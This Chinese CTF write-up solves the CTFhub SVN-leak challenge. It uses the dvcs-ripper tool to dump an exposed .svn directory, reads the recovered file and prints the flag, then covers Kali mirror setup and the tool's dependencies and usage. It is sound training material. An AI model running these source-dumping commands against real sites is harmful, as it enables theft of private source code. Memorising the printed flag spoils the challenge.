SVN源代码漏洞原理

由于管理员操作不规范,将SVN隐藏文件夹暴露到公网,造成源代码泄露。

利用.svn/entrieswc.db文件获取服务器源码

CTFhub SVN泄露 WriteUp

场景地址:http://challenge-79ed2df4ce8b050a.sandbox.ctfhub.com:10080/

image-20210320123221287

提示SVN泄露,使用dvcs-ripper工具

1
/rip-svn.pl -v -u http://challenge-79ed2df4ce8b050a.sandbox.ctfhub.com:10080/

image-20210320123410692

进入.svn目录

1
cd .svn

tree一下.svn目录

1
tree .svn

image-20210320123613334

最终在.svn/pristine/95目录下,cat一下95dde9131c85e8775b63fad42e8176cde78b55be.svn-base文件

flag就在这个文件中

1
cat 95dde9131c85e8775b63fad42e8176cde78b55be.svn-base

image-20210320123829526

flag为:ctfhub{dfecdf8f3f2b34d43aa4d627}

dvcs-ripper 工具使用

更换kali镜像源:

1
nano /etc/apt/sources.list

替换内容如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#aliyun 阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

# ustc 中科大
# deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
# deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
# deb http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free
# deb-src http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free

# kali 官方源
# deb http://http.kali.org/kali kali-rolling main non-free contrib 
# deb-src http://http.kali.org/kali kali-rolling main non-free contrib 

# 默认的,可以注释掉不用管
# deb http://security.kali.org/kali-security kali-rolling/updates main contrib non-free
# deb-src http://security.kali.org/kali-security kali-rolling/updates main contrib non-free

安装依赖:

1
sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl

使用方法:

1
./rip-svn.pl -v -u http://example.com/